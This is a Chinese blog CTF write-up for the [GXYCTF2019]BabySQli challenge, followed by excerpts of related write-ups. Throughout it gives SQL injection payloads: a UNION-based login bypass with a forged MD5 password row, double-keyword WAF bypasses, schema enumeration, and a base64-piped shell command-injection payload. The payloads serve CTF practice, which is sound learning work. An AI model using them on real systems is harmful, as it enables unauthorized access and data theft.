web-[GXYCTF2019]BabySQli

最新推荐文章于 2023-01-05 15:15:28 发布
最新推荐文章于 2023-01-05 15:15:28 发布
阅读量315 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wojiushilsy/article/details/107168580
版权

题目要点

  • 当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。

题目内容

在这里插入图片描述

解题

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!
查看源码search.php看到MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
base32+base64解密后得到select * from user where username = '$name'
尝试user=admin&pass=123 提示为wrong pass,再尝试user=aa提示wrong user,说明有admin这个user的。
尝试union联合注入,user=' union select 1,2,3 #不报错,user=' union select 1,2,3,4 #报错了

当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。
payload:

username栏:‘union select 1,admin’,‘e10adc3949ba59abbe56e057f20f883e’#
password栏:123456

总结:这个题考察的就是简单的手工注入+联合查询查询不存在数据会构造虚拟的数据。

超级神兽小金刚
关注
专栏目录
[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 670
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询不存在数据联合查询构造一个虚拟数据。这候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
web-[极客大挑战 2019]BabySQL
wojiushilsy的博客
05-13 331
题目要点题目内容解题1.查询数据库2.查询表名3.查询字段名4.查询数据 题目要点 双写绕过:waf将关键字替换为空。 题目内容 解题 1.查询数据库 /check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 结果 Hello 2! Your.
BUUCTF WEB BabySql
qq_41696858的博客
09-03 330
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的候(直接输入order by 1回显der 1): admin’ oorrder bbyy 1# 测试到4的出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
BUUCTF - web - BabySQL
1tachi的博客
11-04 286
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 222
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本题目中,我们面对的是一个典型的Web安全问题——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 792
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
[GXYCTF2019]BabySQli
qq_43622442的博客
04-20 3033
[GXYCTF2019]BabySQli 1.打开网站,就一登录框: 2.随便弱口令登一下,放burp里面方便一些: 3.发现了一段字符串,看着这纯大写+数字,就猜是base32: 4.带两等号,应该就直接是base64了: 5.万能密码试一下(这里or被拦截,大小写绕过,等号被拦截可以<>或者like或者其他的函数绕过): 发现还是密码错误。这种题我做过,后端逻辑也就是...
[GXYCTF2019] web题-Ping Ping Ping
BROTHERYY的博客
07-07 661
复现环境:buuoj.cn 开题发现是命令执行的题 ls查看下 使用cat发现空格被过滤了,这里用$IFS$1来代替空格,读取flag.php也被过滤了,这里读取index.php 根据过滤来构建payload Y2F0IGZsYWcucGhw 是cat flag.php的base64编码 echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 我只做了这个解法,但这题还有其他的解法。 ...
web 18.babysql
yu_jing_hong的博客
09-01 173
题目提示有过滤,首先尝试万能密码登录 可以根据错误提示知道or被过滤掉了,可以尝试双写绕过 果然没这么简单得到flag,再尝试注入 猜字段,构造payload:?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1 又提示错误,肯定是union select被过滤了,双写绕过 payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &.
BUUCTF WEB [GXYCTF2019]BabySQli
Y1da的博客
04-18 803
BUUCTF WEB [GXYCTF2019]BabySQli 手工注入 这里需要利用sqli的一个特性:在联合查询不存在数据联合查询构造一个虚拟数据 假设联合查询前表结构如下 id name password 1 tom 123456 此执行联合查询 select * from 'users' where name='admin' union select 2,'admin','123'; 表结构将变成 id name password 1
【BUUCTF-Web】[GXYCTF2019]BabySQli
weixin_49298681的博客
01-05 180
SQLFuzz。
web buuctf [GXYCTF2019]BabySQli1
weixin_44214568的博客
03-18 1476
知识点:联合注入(当联合查询不存在联合查询构造一个虚拟数据) 1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入 2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了); 3.级联注入:在用户栏输入1' union select 1,2# 报错Error: The used SELECT statements have a differ
BUU_web [极客大挑战 2019]BabySQL
qq_46635165的博客
09-28 236
打开解题网址,一个账号密码输入框,根据题目,显然是sql注入: 尝试以 admin ,弱密码登录: 发现是get传参,提示登录错误用户或密码,进行抓包,并尝试单引号报错,找到报错显示位: %23尝试闭合语句,闭合成功: 到这里,有个一点需要注意: 如果用 burpsuite 进行sql注入,那么语句里面包含的空格 或者 # 号需要进行手动url编码再写入payload,因为 burpsuite 上是直接以 url 传参,不再对数据进行自动url编码;而如果是直接在输入框上做 sql 注入,则不用
CVE-2019-0232漏洞复现
m0_62314360的博客
01-04 3819
漏洞背景介绍: 2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。该漏洞只对Windows平台有效,Apache Tomcat 9.0.0.M1到9.0.17,8.5.0到8.5.39和7.0.0到7.0.93中的CGI Servlet很容易受到远程执行代码的影响,攻击者向CGI Servlet发送一个精心设计的请求,可在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将...
[极客大挑战 2019] web题-BabySQL
BROTHERYY的博客
07-08 291
复现环境:buuoj.cn 他又来了,上次被日了,这次还是要被日 发现被过滤了 用双写绕过 获取所有数据库 获取ctf库中所有的表 获取表内字段 获取表内数据 flag{85f76441-5982-4c33-975e-23a8f7365874}
buuctf babysqli
weixin_55567437的博客
07-15 137
从这条信息可以知道这是base32码,解码得到一个base64码 解码得到一个: select * from user where username = '".$name."' 不能得到有用的信息但通过题目源码得知password被md5加密了 所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。 通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123 '......'就是123的...
buuctf BabySQli
qq_44111753的博客
01-02 1064
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2503
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值